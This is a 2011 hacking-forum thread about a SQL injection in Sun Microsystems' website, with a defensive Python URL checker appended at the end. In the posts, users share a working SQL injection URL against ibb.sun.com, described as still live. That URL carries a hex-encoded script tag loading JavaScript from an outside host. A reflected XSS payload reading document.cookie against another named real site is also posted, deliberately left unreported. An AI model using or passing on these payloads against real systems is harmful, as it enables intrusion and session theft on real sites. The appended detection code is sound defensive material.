sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
If you have some interesting news or want to throw up a link to discuss it, here's the place. Anything is okay, even shameless vendor launches (since that is often applicable to what we work on). 
Oracle Sun Microsystems (www.sun.com) Hacked by TinKode
Posted by: TinKode
Date: March 27, 2011 05:34PM

Oracle Sun Microsystems [www.sun.com] vulnerable to SQL Injection. More here: [goo.gl] - TinKode

Re: Oracle Sun Microsystems (www.sun.com) Hacked by TinKode
Posted by: VMw4r3
Date: March 27, 2011 09:05PM

It's still live...

http://ibb.sun.com/apps/availlist/index.php?id=385+and+1=2+union+all+select+1,2,0x3C736372697074206C616E67756167653D4A617661536372697074207372633D687474703A2F2F68612E636B6572732E6F72672F733E3C2F7363726970743E,4,5,6,7,8,9,10,11,12,13--&subv=5&subc=3





Edited 1 time(s). Last edit at 03/27/2011 09:07PM by VMw4r3.

Re: Oracle Sun Microsystems (www.sun.com) Hacked by TinKode
Posted by: Skyphire
Date: April 01, 2011 10:53PM

OLD skool

Re: Oracle Sun Microsystems (www.sun.com) Hacked by TinKode
Posted by: skpx_
Date: April 08, 2011 01:09AM

hxxp://www.vs-db.info/?p=533

Found that reman.sun.com one last year =\ I guess they let it sit for this long.

Re: Oracle Sun Microsystems (www.sun.com) Hacked by TinKode
Posted by: VMw4r3
Date: April 08, 2011 02:34AM

@skpx_
I see that.. May 2nd, 2010 <-- nearly a year now......

I gave up on reporting vulnerabilities to admins on large sites, as they nearly always choose to ignore any vulnerabilities I point out.

Normally I wait a week or 2 before reporting, but with oxegen.ie I've been holding back for at least 5 months now.

They are on WordPress, the index.php/search is vulnerable for some reason.

http://www.oxegen.ie/?s="><script>alert(document.cookie)</script>

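A defender's view of the two request shapes posted in this thread, as an added example that is not part of the original posts: a Python check over requested URLs that flags UNION SELECT in a query parameter, decodes 0x hex literals so that markup a plain-text filter would miss becomes visible, and flags script markup in a search parameter. The host-less paths, the sample requests, and the `NUMERIC_PARAMS` set are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
# MySQL-style hex string literal, at least 4 bytes long
HEX_RE = re.compile(r"\b0x((?:[0-9a-f]{2}){4,})\b", re.I)
MARKUP_RE = re.compile(r"<\s*script\b|\bon\w+\s*=|javascript:", re.I)
# Assumption: parameters the application only ever uses as integers
NUMERIC_PARAMS = {"id"}


def decode_hex_literals(value):
    """Return the text carried by each 0x... literal found in value."""
    return [bytes.fromhex(m.group(1)).decode("latin-1")
            for m in HEX_RE.finditer(value)]


def inspect_request(url):
    """Return a sorted list of findings for one requested URL."""
    findings = set()
    # parse_qsl undoes '+' and percent-encoding, as the web server would
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not value.strip().isdigit():
            findings.add(f"non-numeric value in integer parameter '{name}'")
        if UNION_RE.search(value):
            findings.add(f"UNION SELECT in '{name}'")
        if MARKUP_RE.search(value):
            findings.add(f"script markup in '{name}'")
        # A filter that only looks for "<script" never sees the hex form
        if any(MARKUP_RE.search(t) for t in decode_hex_literals(value)):
            findings.add(f"script markup inside hex literal in '{name}'")
    return sorted(findings)


# Constructed sample requests (not taken from any real log)
SAMPLES = [
    "/apps/list/index.php?id=385&subv=5",
    "/apps/list/index.php?id=385+and+1=2+union+all+select+1,0x3c7363726970743e,3--&subv=5",
    "/?s=%22%3E%3Cscript%3Ealert(1)%3C/script%3E",
    "/?s=union+all+hands",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(url, "->", inspect_request(url) or "clean")
```

Flagging is only the detection half; the fix on the application side is to bind `id` as an integer in a parameterized query and to HTML-escape the search term when it is echoed back.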